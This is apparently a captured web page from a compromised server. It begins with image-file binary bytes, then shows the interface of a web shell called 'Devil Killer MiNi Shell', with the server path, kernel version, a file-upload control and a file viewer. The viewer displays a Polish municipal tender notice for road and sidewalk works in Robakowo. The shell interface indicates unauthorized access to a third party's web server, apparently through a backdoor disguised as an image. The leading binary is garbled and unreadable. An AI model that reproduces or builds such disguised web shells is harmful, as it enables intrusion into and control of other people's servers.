JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220511/0015296301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ulicy Stefana Lewińskiego w Robakowie polegająca na budowie chodnika wraz z remontem nawierzchni jezdni. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LUZINO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675340</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ofiar Stutthofu 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Luzino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-242</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@luzino.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.luzino.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ulicy Stefana Lewińskiego w Robakowie polegająca na budowie chodnika wraz z remontem nawierzchni jezdni. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-448eee1c-d0f7-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00152963</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037003/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Utwardzenie ul. Stefana Lewińskiego w Robakowie (odcinek od ul. Św. Jana do ul. Kwiatowej)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/pn/ug_luzino/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/pn/ug_luzino/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia, komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą<br/>elektroniczną, za pośrednictwem Platformy Zakupowej Open Nexus Sp. z o.o.,<br/>platformazakupowa.pl (zwanej w treści jako „Platforma zakupowa” lub „Platforma”), pod adresem:<br/>https://www.platformazakupowa.pl/pn/ug_luzino/proceedings i formularza „Wyślij wiadomość do Zamawiającego” znajdującego się na stronie danego postępowania.<br/>2. Wymagania techniczne i organizacyjne sporządzenia, wysyłania i odbierania korespondencji elektronicznej, przekazywane przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>3. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej i opatrzona kwalifikowanym podpisem elektronicznym, lub podpisem zaufanym lub podpisem osobistym. Ofertę sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2021 r. poz. 670, 952, 1005), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 pzp, z uwzględnieniem rodzaju przekazywanych danych, np. .pdf, .doc, .docx, .rtf,.xps, .odt. 4. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, lub podpisu zaufanego lub podpisu osobistego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r., w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L z 04.05.2016r. Nr 119, str. 1; z<br/>2018 r. Nr 127 poz. 2, z 2021r. nr 74 poz. 35), dalej „RODO”, informujemy, że: 1) administratorem<br/>Pani/Pana danych osobowych jest Gmina Luzino, 2) kontakt do inspektora ochrony danych osobowych<br/>w Gminie Luzino, adres e-mail: inspektor.abi@gmail.com , 3) Pani/Pana dane osobowe przetwarzane<br/>będą na podstawie art. 6 ust. 1 lit. c RODO, w celu prowadzenia przedmiotowego postępowania o<br/>udzielenie zamówienia publicznego oraz zawarcia<br/>umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywający na Zamawiającym; 4) odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; 5) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; 6) obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>- konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; 8) posiada Pan/Pani: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia<br/>Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności<br/>protokołu oraz jego załączników; c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; 9) nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust.1 lit. c RODO. 3.16.) RODO ograniczenia stosowania)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">2. Jednocześnie Zamawiający przypomina o ciążącym na<br/>Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których<br/>dane przekazane zostaną Zamawiającemu w związku z prowadzonym<br/>postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w<br/>postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust.<br/>5 RODO. 3. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO,<br/>wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia. 4. Wystąpienie z<br/>żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego. 5. Przysługuje Pani/Panu<br/>prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana<br/>danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd<br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są roboty budowlane polegające na utwardzeniu nawierzchni jezdni kostką betonową wraz z budową chodnika i zjazdów indywidualnych na odcinku ul. Stefana Lewińskiego, tj. w km 0+000,00 do km 0+217,10, w miejscowości Robakowo.<br/>UWAGA<br/>dotycząca zakresu robót budowlanych podlegających wycenie!<br/>W związku z tym, że zakres przedmiotu zamówienia, został ograniczony w stosunku do zakresu określonego w załączonej do SWZ dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, wycenie podlega zakres robót, który został określony w przedmiarze robót, stanowiącym załącznik do niniejszej SWZ. Przedmiotowe ograniczenie należy konsekwentnie uwzględnić czytając treść dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych.<br/>2.	Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe odnoszące się do, co najmniej głównych elementów składających się na przedmiot zamówienia, określone zostały w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych, stanowiących Załącznik nr 4 do niniejszej SWZ.<br/>3.	Do każdej normy, przywołanej zarówno, w dokumentacji projektowej jak i specyfikacji technicznej wykonania i odbioru robót budowlanych, dopisuje się określenie „lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena przeprowadzona będzie w skali punktowej 0-100 pkt. Oferta najtańsza otrzyma 100 pkt., pozostałe proporcjonalnie mniej (proporcjonalność liniowa).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">20.1. W celu potwierdzenia braku podstaw wykluczenia, Zamawiający wezwie Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, niżej wymienionych podmiotowych środków dowodowych aktualnych na dzień ich złożenia: 1) odpisu lub<br/>informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3<br/>miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem<br/>terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności; 3) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału<br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie<br/>art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem<br/>albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>20.2. Jeżeli Wykonawca ma siedzibę lub miejsca zamieszkania poza granicami Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 20.1 ppkt. 1, – składa dokument lub dokumenty wystawione w<br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, odpowiednio, że:<br/>1) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne,<br/>2) nie otwarto likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej<br/>tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.20.3. Dokumenty, o których mowa w pkt 20.1, powinny być wystawione nie wcześniej niż 3<br/>miesiące przed ich złożeniem.<br/>20.4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 20.1, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których<br/>mowa w art. 108 ust. 1 pkt 1, 2 i 4, art. 109 ust. 1 pkt 1, 2 lit. a i b oraz pkt 3 ustawy, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu<br/>na siedzibę lub miejsce zamieszkania wykonawcy. Przepis pkt 20.3 stosuje się.<br/>Pozostałe informacje w rozdziale XX SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca, najpóźniej przed upływem terminu składania ofert, winien wnieść wadium w wysokości: 4.500,00 zł (słownie: cztery tysiące pięćset zł i 00/100) i utrzymać go nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). <br/>3.	Wadium wniesione w pieniądzu należy złożyć przelewem bankowym na konto Zamawiającego: 81 8349 0002 0012 8818 2000 0090 z dopiskiem: WADIUM – PRZEBUDOWA ULICY STEFANA LEWIŃSKIEGO W ROBAKOWIE POLEGAJĄCA NA BUDOWIE CHODNIKA WRAZ Z REMONTEM NAWIERZCHNI JEZDNI – sprawa 5.2022.<br/>4.	Za termin wniesienia wadium w formie pieniężnej uznaje się datę uznania środków na koncie Zamawiającego (dzień, godzina).<br/>5.	W przypadku złożenia wadium w innej formie niż pieniężna, Wykonawca przekazuje Zamawiającemu:<br/>a)	oryginał gwarancji bankowej lub poręczenia, w postaci elektronicznej, podpisane kwalifikowanym podpisem elektronicznym przez wystawcę, <br/>albo <br/>b)	oryginał gwarancji ubezpieczeniowej w postaci elektronicznej.<br/>Uwaga!<br/>Cyfrowe odwzorowanie (kopia elektroniczna dokumentu zapisanego w postaci papierowej, np. skan, fotokopia) nie stanowi oryginału gwarancji lub poręczenia w postaci elektronicznej. <br/>6.	Wadium wniesione przez jednego z Wykonawców wspólnie ubiegających się o zamówienie uważa się za wniesione prawidłowo.<br/>7.	Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>1)	upływu terminu związania ofertą; <br/>2)	zawarcia umowy w sprawie zamówienia publicznego; <br/>3)	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>8.	Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy: <br/>1)	który wycofał ofertę przed upływem terminu składania ofert; <br/>2)	którego oferta została odrzucona; <br/>3)	po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza; <br/>4)	po unieważnieniu postępowania, w przypadku, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <br/>9.	